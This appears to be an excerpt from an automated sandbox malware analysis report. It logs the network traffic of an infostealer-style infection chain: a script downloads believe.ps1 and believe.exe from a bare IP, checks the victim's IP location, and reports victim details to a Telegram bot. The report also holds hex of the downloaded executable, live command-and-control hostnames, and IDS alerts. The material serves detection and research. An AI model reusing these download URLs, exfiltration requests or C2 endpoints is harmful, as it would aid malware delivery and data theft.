                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:22:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 17 Feb 2025 11:23:00 GMTETag: "43600-62e54bf3d7570"Accept-Ranges: bytesContent-Length: 275968Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 68 ba 8e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 04 00 00 14 00 00 00 00 00 00 7e 3e 04 00 00 20 00 00 00 40 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 3e 04 00 4b 00 00 00 00 40 04 00 17 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 1e 04 00 00 20 00 00 00 20 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 10 00 00 00 40 04 00 00 12 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 04 00 00 02 00 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 3e 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 9e 02 00 a4 9f 01 00 03 00 00 00 ab 00 00 06 d4 9d 02 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 7d fc 0f 8e b3 e8 69 73 af ff 00 00 00 00 00 00 01 02 03 04 06 08 08 00 00 00 00 00 00 00 00 7e 00 00 00 46 00 00 00 40 00 00 00 37 00 00 00 25 00 00 00 6d 00 00 00 24 00 00 00 7e 00 00 00 7e 00 00 00 64 00 00 00 72 00 00 00 61 00 00 00 47 00 00 00 6f 00 00 00 6e 00 00 00 7e 00 00 00 1e 02 28 20 00 00 0a 2a 26 00 02 28 21 00 00 0a 00 2a ce 73 22 00 00 0a 80 01 00 00 04 73 23 00 00 0a 80 02 00 00 04 73 24 00 00 0a 80 03 00 00 04 73 25 00 00 0a 80 04 00 00 04 73 26 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 39 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 3a 00 00 0a 00 2a 26 00 03 fe 15 06 00 00 1b 2a 22 00 02 80 09 00 00 04 2a 56 73 1d 00 00 06 28 43 00 00 0a 74 09 00 00 02 80 0a 00 00 04 2a 1e 02 28 44 00 00 0a 2a 22 7e 0b 00 00 04 2b 00 2a 22 7e 0c 00 00 04 2b 00 2a 22 7e 0d 00 00 04 2b 00 2a 1e 02 80 0d 00 00 04 2a 22 7e 0e 00 00 04 2b 00 2a 22 7e 0f 00
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2014/03/2025%20/%2012:09:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /dev/believe.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                  Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49728 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49725 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49727 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49729 -> 104.21.112.1:443
                  Source: global trafficHTTP traffic detected: GET /dev/believe.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.65.144.3Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49726 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2014/03/2025%20/%2012:09:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /dev/believe.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.65.144.3Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /dev/believe.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 09:22:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: x.exe, 0000000A.00000002.1435246368.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3
                  Source: wscript.exe, 00000000.00000003.1371839650.0000026208450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/
                  Source: x.exe, 0000000A.00000002.1435246368.0000000002C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/believe.exe
                  Source: x.exe, 0000000A.00000002.1435246368.0000000002C0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/believe.exeP
                  Source: wscript.exe, 00000000.00000003.1228286443.000002620808E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228238787.0000026208071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1462936852.000002620808C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1464059045.0000026208447000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1377013226.0000026208118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/believe.ps1
                  Source: wscript.exe, 00000000.00000003.1371839650.0000026208450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/believe.ps1i
                  Source: wscript.exe, 00000000.00000003.1371839650.0000026208450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/believe.ps1ro
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: powershell.exe, 00000008.00000002.1435086451.000001DE1007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1435086451.000001DE1021D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE00001000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1435246368.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1435246368.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20a
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enh
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: wscript.exe, 00000000.00000003.1371839650.0000026208450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1464059045.0000026208447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: powershell.exe, 00000008.00000002.1435086451.000001DE1007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1435086451.000001DE1021D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1410607287.000001DE01B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000008.00000002.1410607287.000001DE01614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
